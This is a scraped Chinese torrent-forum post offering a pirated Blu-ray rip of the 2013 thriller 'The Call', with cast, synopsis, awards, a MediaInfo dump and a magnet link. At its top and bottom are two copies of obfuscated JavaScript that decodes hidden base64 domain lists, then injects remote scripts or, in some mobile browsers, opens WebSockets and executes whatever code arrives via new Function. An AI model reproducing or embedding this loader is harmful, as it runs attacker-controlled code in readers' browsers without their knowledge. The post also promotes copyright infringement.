致命呼叫[中文字幕].The.Call.2013.1080p.Tw.BluRay.x265.10bit.DTS 5.96GB

版主小s 29天前 166

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译 名 致命呼叫 / 绝命连线(台) / 救参通话(港) / 危情911

◎片 名 The Call

◎年 代 2013

◎产 地 美国

◎类 别 惊悚

◎语 言 英语

◎上映日期 2013-03-15(美国)

◎IMDb链接 https://www.imdb.com/title/tt1911644/

◎豆瓣评分 7.4/10 (22332人评价)

◎豆瓣链接 https://movie.douban.com/subject/10554990/

◎片 长 94分钟

◎导 演 布拉德·安德森 Brad Anderson (id:1274486)

◎编 剧 理查德·奥维德 Richard D'Ovidio (id:1330399)

◎演 员 哈莉·贝瑞 Halle Berry (id:1054415)

阿比盖尔·布雷斯林 Abigail Breslin (id:1025142)

摩里斯·切斯塔特 Morris Chestnut (id:1013859)

迈克尔·艾克朗德 Michael Eklund (id:1319132)

大卫·奥唐家 David Otunga (id:1329068)

Lisa Grady Lisa Grady (id:1451428)

迈克尔·因佩里奥利 Michael Imperioli (id:1002729)

埃拉·雷·派克 Ella Rae Peck (id:1229227)

何塞·祖尼加 José Zú?iga (id:1301811)

乔纳森·尼科尔斯 Jonathan Nichols (id:1459012)

约翰·戴布尼 John Debney (id:1025369)

◎标 签 惊悚 / 犯罪 / 美国 / 悬疑 / 哈莉·贝瑞 / 2013 / 剧情 / 电影

◎简 介

特纳(哈莉·贝瑞 Halle Berry 饰)是一名911报案中心的接线员,一天她接到一个小女孩的电话,声称有陌生人闯入家中,特纳随即让她躲起来,然而此时通话突然断线,特纳焦急地回拨,不料却因此暴露了女孩的躲藏地,令其不幸被入侵者杀害。从此特纳陷入愧疚的深渊,无法再担任接线员的工作。半年后,特纳当了一名接线员导师。这天,一个新手接到一通报案电话,另一端的女孩凯西(阿比盖尔·布蕾斯琳 Abigail Breslin 饰)被绑匪困在汽车后备箱中,情况十分危急。经过侦查,特纳竟然发现歹徒就是当年杀死那个小女孩的凶手,出于愤慨和赎罪,她立即下定决心要亲自将歹徒捉拿归案。一场惊心动魄的电话缉凶即将展开,然而令众人意想不到的是,一个隐藏多年的秘密也渐渐浮出水面……

◎获奖情况 (共2项)

第34届金酸莓奖 (2014)

最差女主角(提名)

└──哈莉·贝瑞 (id:1054415)

第15届美国青少年选择奖 (2013)

最佳剧情片女演员(提名)

└──哈莉·贝瑞 (id:1054415)

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 264369414705434270451091032389598494777 (0xC6E3B27CC1A685B4166C23FDE8FEC039)

  4. Complete name : [email protected]v

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 5.96 GiB

  8. Duration : 1 h 34 min

  9. Overall bit rate : 9 040 kb/s

  10. Encoded date : UTC 2021-11-01 10:05:09

  11. Writing application : mkvmerge v53.0.0 ('Fool's Gold') 64-bit

  12. Writing library : libebml v1.4.1 + libmatroska v1.6.2


  13. Video

  14. ID : 1

  15. Format : HEVC

  16. Format/Info : High Efficiency Video Coding

  17. Format profile : Main [email protected]@Main

  18. Codec ID : V_MPEGH/ISO/HEVC

  19. Duration : 1 h 34 min

  20. Bit rate : 7 298 kb/s

  21. Width : 1 920 pixels

  22. Height : 1 036 pixels

  23. Display aspect ratio : 1.85:1

  24. Frame rate mode : Constant

  25. Frame rate : 24.000 FPS

  26. Color space : YUV

  27. Chroma subsampling : 4:2:0

  28. Bit depth : 10 bits

  29. Bits/(Pixel*Frame) : 0.153

  30. Stream size : 4.81 GiB (81%)

  31. Writing library : x265 3.5+2-g2b25c9ba0+45:[Windows][GCC 10.2.0][64 bit] Yuuki 10bit+8bit+12bit

  32. Encoding settings : rc=crf / crf=16.0000 / qcomp=0.60 / qpstep=4 / stats-write=0 / stats-read=0 / no-lossless / no-cu-lossless / aq-mode=3 / aq-strength=0.80 / cbqpoffs=0 / crqpoffs=0 / ipratio=1.40 / pbratio=1.30 / psy-rd=2.00 / psy-rdoq=0.00 / deblock=0:0 / ref=6 / limit-refs=1 / no-limit-modes / bframes=8 / b-adapt=2 / bframe-bias=0 / b-pyramid / b-intra / weightp / weightb / min-keyint=24 / max-keyint=240 / rc-lookahead=24 / gop-lookahead=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / max-cu-size=64 / min-cu-size=8 / me=3 / subme=7 / merange=48 / rdoq-level=0 / rd=4 / rdpenalty=0 / dynamic-rd=0.00 / no-rd-refine / ----- / cutree / sao / no-rect / no-amp / no-open-gop / wpp / no-pmode / no-pme / no-psnr / no-ssim / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-tu-size=32 / tu-inter-depth=1 / tu-intra-depth=1 / limit-tu=0 / qg-size=32 / qpmax=69 / qpmin=0 / ----- / cpuid=533541111039 / frame-threads=5 / numa-pools=+ / log-level=2 / input-csp=1 / input-res=1920x1036 / interlace=0 / level-idc=0 / high-tier=1 / uhd-bd=0 / no-allow-non-conformance / no-repeat-headers / aud / no-hrd / info / hash=0 / no-temporal-layers / lookahead-slices=0 / no-splice / no-intra-refresh / no-ssim-rd / signhide / no-tskip / max-merge=3 / temporal-mvp / no-frame-dup / no-hme / no-analyze-src-pics / no-sao-non-deblock / selective-sao=4 / early-skip / rskip / no-fast-intra / no-tskip-fast / no-splitrd-skip / zone-count=0 / no-strict-cbr / no-rc-grain / no-const-vbv / sar=0 / overscan=0 / videoformat=5 / range=0 / colorprim=2 / transfer=2 / colormatrix=2 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / scenecut-aware-qp=0conformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0 / no-vbv-live-multi-pass

  33. Language : English

  34. Default : Yes

  35. Forced : No


  36. Audio

  37. ID : 2

  38. Format : DTS

  39. Format/Info : Digital Theater Systems

  40. Codec ID : A_DTS

  41. Duration : 1 h 34 min

  42. Bit rate mode : Constant

  43. Bit rate : 1 510 kb/s

  44. Channel(s) : 6 channels

  45. Channel layout : C L R Ls Rs LFE

  46. Sampling rate : 48.0 kHz

  47. Frame rate : 93.750 FPS (512 SPF)

  48. Bit depth : 24 bits

  49. Compression mode : Lossy

  50. Stream size : 1 019 MiB (17%)

  51. Default : Yes

  52. Forced : No


  53. Text #1

  54. ID : 3

  55. ID in the original source medium : 4611 (0x1203)

  56. Format : PGS

  57. Muxing mode : zlib

  58. Codec ID : S_HDMV/PGS

  59. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  60. Duration : 1 h 27 min

  61. Bit rate : 119 kb/s

  62. Count of elements : 4208

  63. Stream size : 75.0 MiB (1%)

  64. Language : Chinese

  65. Default : Yes

  66. Forced : No

  67. Original source medium : Blu-ray


  68. Text #2

  69. ID : 4

  70. ID in the original source medium : 4612 (0x1204)

  71. Format : PGS

  72. Muxing mode : zlib

  73. Codec ID : S_HDMV/PGS

  74. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  75. Duration : 1 h 27 min

  76. Bit rate : 122 kb/s

  77. Count of elements : 4207

  78. Stream size : 76.8 MiB (1%)

  79. Language : Chinese

  80. Default : No

  81. Forced : No

  82. Original source medium : Blu-ray


  83. Text #3

  84. ID : 5

  85. ID in the original source medium : 4613 (0x1205)

  86. Format : PGS

  87. Muxing mode : zlib

  88. Codec ID : S_HDMV/PGS

  89. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  90. Duration : 1 h 27 min

  91. Bit rate : 84.9 kb/s

  92. Count of elements : 4206

  93. Stream size : 53.3 MiB (1%)

  94. Language : Chinese

  95. Default : No

  96. Forced : No

  97. Original source medium : Blu-ray


  98. Text #4

  99. ID : 6

  100. ID in the original source medium : 4614 (0x1206)

  101. Format : PGS

  102. Muxing mode : zlib

  103. Codec ID : S_HDMV/PGS

  104. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  105. Duration : 1 h 27 min

  106. Bit rate : 87.7 kb/s

  107. Count of elements : 4205

  108. Stream size : 55.1 MiB (1%)

  109. Language : Chinese

  110. Default : No

  111. Forced : No

  112. Original source medium : Blu-ray


  113. Text #5

  114. ID : 7

  115. ID in the original source medium : 4609 (0x1201)

  116. Format : PGS

  117. Muxing mode : zlib

  118. Codec ID : S_HDMV/PGS

  119. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  120. Duration : 1 h 26 min

  121. Bit rate : 25.0 kb/s

  122. Count of elements : 1928

  123. Stream size : 15.6 MiB (0%)

  124. Language : Chinese

  125. Default : No

  126. Forced : No

  127. Original source medium : Blu-ray


  128. Text #6

  129. ID : 8

  130. ID in the original source medium : 4608 (0x1200)

  131. Format : PGS

  132. Muxing mode : zlib

  133. Codec ID : S_HDMV/PGS

  134. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  135. Duration : 1 h 26 min

  136. Bit rate : 27.4 kb/s

  137. Count of elements : 1928

  138. Stream size : 17.0 MiB (0%)

  139. Language : Chinese

  140. Default : No

  141. Forced : No

  142. Original source medium : Blu-ray


  143. Text #7

  144. ID : 9

  145. ID in the original source medium : 4610 (0x1202)

  146. Format : PGS

  147. Muxing mode : zlib

  148. Codec ID : S_HDMV/PGS

  149. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  150. Duration : 1 h 26 min

  151. Bit rate : 26.1 kb/s

  152. Count of elements : 1927

  153. Stream size : 16.2 MiB (0%)

  154. Language : English

  155. Default : No

  156. Forced : No

  157. Original source medium : Blu-ray


  158. Menu

  159. 00:00:00.000 : en:第 01 章

  160. 00:05:56.583 : en:第 02 章

  161. 00:10:42.000 : en:第 03 章

  162. 00:17:32.791 : en:第 04 章

  163. 00:20:49.250 : en:第 05 章

  164. 00:23:22.125 : en:第 06 章

  165. 00:31:06.208 : en:第 07 章

  166. 00:33:06.958 : en:第 08 章

  167. 00:36:16.500 : en:第 09 章

  168. 00:43:07.375 : en:第 10 章

  169. 00:46:36.958 : en:第 11 章

  170. 00:50:51.125 : en:第 12 章

  171. 00:55:06.208 : en:第 13 章

  172. 00:59:32.250 : en:第 14 章

  173. 01:03:29.583 : en:第 15 章

  174. 01:07:54.583 : en:第 16 章

  175. 01:12:03.416 : en:第 17 章

  176. 01:14:39.708 : en:第 18 章

  177. 01:20:18.000 : en:第 19 章

  178. 01:28:05.416 : en:第 20 章




复制代码


TAGS 惊悚

磁力链:
  • magnet:?xt=urn:btih:AC2662F50728EB297FE1FDA3B00A055EF844C790

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};